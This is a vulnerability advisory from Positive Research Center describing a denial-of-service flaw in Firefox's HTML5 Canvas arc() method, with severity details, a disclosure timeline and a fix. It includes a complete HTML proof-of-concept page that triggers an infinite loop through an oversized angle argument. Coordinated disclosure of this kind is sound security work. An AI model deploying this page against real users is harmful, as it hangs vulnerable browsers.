PT-2011-16: Denial Of Service in Mozilla Firefox Vulnerable softwareMozilla Firefox Version 3.6.12-16.0 and possibly earlierApplication link: http://www.mozilla.com/en-US/firefox/new/ Severity levelSeverity level: Medium Impact: Denial of Service Access Vector: Network exploitable CVSS v2: Base Score: 5 Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)CVE: not assignedSoftware descriptionMozilla Firefox is the second most widely used web browser. Vulnerability descriptionPositive Research Center has discovered a Denial of Service vulnerability in Mozilla Firefox.Due to insufficient checks of input parameters of HTML5 Canvas' Arc() method, Mozilla Firefox allows a remote attacker to cause a denial of service (infinite loop).Example of HTML code triggering the vulnerability: <html> <head> <script type="text/javascript"> window.onload = function() { var drawingCanvas = document.getElementById('can'); if(drawingCanvas && drawingCanvas.getContext) { var context = drawingCanvas.getContext('2d'); context.arc(100,100,50,999999999999999999999999999999, 0, true); } } </script> </head> <body> <canvas id="can" width="200" height="200"> <p>sorry, no html5.</p> </canvas> </body> </html> How to fixUpdate your software up to the latest version.Advisory status 29.06.2011 - Vendor is notified 15.07.2011 - Vendor gets vulnerability details 14.09.2011 - Vulnerability details were sent to CERT 18.10.2011 - Public disclosureCreditsThe vulnerability was detected by Alexander Zaitsev, Positive Research Center (Positive Technologies Company) Referenceshttp://en.securitylab.ru/lab/PT-2011-16Reports on the vulnerabilities previously discovered by Positive Research:http://www.ptsecurity.com/advisory1.aspx http://en.securitylab.ru/lab/